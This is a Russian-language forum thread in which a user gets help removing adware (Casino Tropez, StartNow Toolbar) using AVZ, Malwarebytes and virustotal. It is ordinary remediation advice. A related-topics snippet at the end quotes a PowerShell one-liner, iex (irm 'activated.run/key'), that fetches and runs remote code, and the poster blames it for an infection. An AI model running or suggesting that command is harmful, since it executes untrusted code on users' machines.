Перейти к содержанию

Нахватала вирусов


Ольга2010

Рекомендуемые сообщения

Пока пыталась посмотреть фильмы онлайн нахваталась вирусов. Касперский все время выскакивал красным цветом, сейчас пишет - на карантине. Можно ли вообще удалить эту папку, в которой вирус, надо ли? При открытии ссылки выбрасывает на страничку с загрузками, но не на конкретно эту папку. Так что ее еще найти надо, куда она спряталась. Скрин привожу.

 

Знаю, что необходимо привести проверки AVZ, прочитала несколько раз, ну не доходит до меня где и что надо нажать, чтобы скачать ее и сделать проверку. Раньше делала и все забыла. Научите еще разок, пожалуйста. Я очень провериться хочу, у меня компьютер, наверно, просто кишит вирусами.

post-16791-1326536969_thumb.jpg

Изменено пользователем Ольга2010
Ссылка на комментарий
Поделиться на другие сайты

Ольга2010

 

Здравствуйте, если подозреваете заражение, ознакомьтесь с правилами данного раздела. Внимательно прочитайте и выполните эти рекомендации

 

P.S. ссылки на необходимые утилиты в п.2 вышеуказанных правил.

Изменено пользователем Tiare
Ссылка на комментарий
Поделиться на другие сайты

Что означает выгрузить?

**Перед запуском утилит обязательно рекомендуется выгрузить антивирусное ПО и сетевые экраны (фаерволл, брандмауэр**

Ссылка на комментарий
Поделиться на другие сайты

Ну как их вставить, не получается.

При создании сообщения есть блок "Прикрепление файлов". Жмёте "Обзор", находите нужный файл, жмёте "Загрузить" и так для каждого отчёта.

  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты

попробую

Надеюсь, что это нужно было. После проверки вроде необходимо удалять AVZ? Как это правильно можно сделать? Какие мои действия нужны сейчас?

virusinfo_syscheck.htm

virusinfo_syscure.htm

info.txt

log.txt

Изменено пользователем Ольга2010
Ссылка на комментарий
Поделиться на другие сайты

Ольга2010,

Скачайте Malwarebytes' Anti-Malware здесь или здесь.

Установите mbam-setup-<current number>.exe

Обновите базы.

После окончания обновления баз откажитесь от использования пробной версии Malwarebytes' Anti-Malware Full (нажмите "Отклонить").

Выберите "Perform Full Scan/Полное сканирование", нажмите "Scan/Сканирование", после сканирования - Ok - "Show Results/Показать результаты".

Ссылка на комментарий
Поделиться на другие сайты

удалите указанные строки в MBAM. После удаления откройте лог и прикрепите его к вашему сообщению.

Обнаруженные ключи в реестре: 1

HKCU\SOFTWARE\Casino Tropez (Adware.Casino) -> Действие не было предпринято.

 

Обнаруженные файлы: 1

C:\Users\Ольга\AppData\Local\Temp\casFC0.tmp (PUP.Casino.Gen) -> Действие не было предпринято.

 

 

+ обновите Internet Explorer v7.00 до актуальной версии

 

Проверьте эти файлы на virustotal

Раскрывающийся текст:

кнопка Обзор - ищите нужный файл у вас в системе - Открыть - Отправить файл (Send file). Нажать на кнопку Reanalyse (если будет). Дождитесь результата .

Ссылку на результат (то, что будет в адресной строке в браузере) копируете и выкладываете в теме.

c:\program files\startnow toolbar\toolbarupdaterservice.exe

C:\Program Files\StartNow Toolbar\Toolbar32.dll

 

+ в KIS запустите проверку системы на уязвимости, и исправьте то, что будет обнаружено.

 

 

StartNow Toolbar сами устанавливали? Если данную программу не используете, то желательно ее деинсталлировать штатным способом.

 

Для справки: StartNow Toolbar -разновидность рекламного ПО.

Ссылка на комментарий
Поделиться на другие сайты

Tiare,

Проверьте эти файлы на virustotal

Какие файлы? Я их удалила.

StartNow Toolbar сами устанавливали? Если данную программу не используете, то желательно ее деинсталлировать штатным способом.

Нет, я вроде удалила в панели управления, а он все-равно живее всех живых. Домашней страницей стал, не знаю. как удалить.

 

Вот то, что осталось сейчас.

mbam_log_2012_01_14__17_58_37_.txt

Изменено пользователем Ольга2010
Ссылка на комментарий
Поделиться на другие сайты

Malwarebytes' Anti-Malware деинсталлируйте.

 

 

Tiare,

Какие файлы? Я их удалила.

Нет, я вроде удалила в панели управления, а он все-равно живее всех живых. Домашней страницей стал, не знаю. как удалить.

вот эти файлы проверить просила на virustotal

c:\program files\startnow toolbar\toolbarupdaterservice.exe

C:\Program Files\StartNow Toolbar\Toolbar32.dll

 

 

Попробуйте удалить

StartNow Toolbar-->C:\Program Files\StartNow Toolbar\StartNowToolbarUninstall.exe

в безопасном режиме.

 

 

Стартовую страницу после удаления программы очистим. Она открывается только в Firefox?

Ссылка на комментарий
Поделиться на другие сайты

Tiare,Tiare,

вот эти файлы проверить просила

У меня их нет, удалила вчера.

Стартовую страницу после удаления программы очистим. Она открывается только в Firefox?

Да, только там открывается.

 

Malwarebytes' Anti-Malware деинсталлируйте.

Удалила

А AVZ надо удалять? Я отчеты выкладывала - там все нормально? И еще вопрос, то, что я выложила скан Касперского - ысвечивается красным - это так и останется? Ничего делать не надо?

 

Включила исправление уязвимостей. исправила, осталось вот это. Что с ними делать?

post-16791-1326622588_thumb.jpg

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • San4s2034
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • San4s2034
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • fertune
      От fertune
      Когда открываешь диспетчер задач то сначала ЦП грузит на 100% а потом на 10% я посмотрел через dr.web cureit и увидел то что это майнер dialer.exe, смотрел в интернете как пофиксить но никакие способы не помогли(может быть я что то делал неправильно)
      можете помочь с проблемой? Еще я пробовал его фиксить удаляя его но он опять появлялся и грузил ЦП на все 100%.
       
    • Temikst
      От Temikst
      Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
      CollectionLog-2025.02.09-23.46.zip

       
      Даже браузер сильно тормозит. после открывание диспетчер задач сразу же лучше работает\
    • VanyeJ
      От VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
×
×
  • Создать...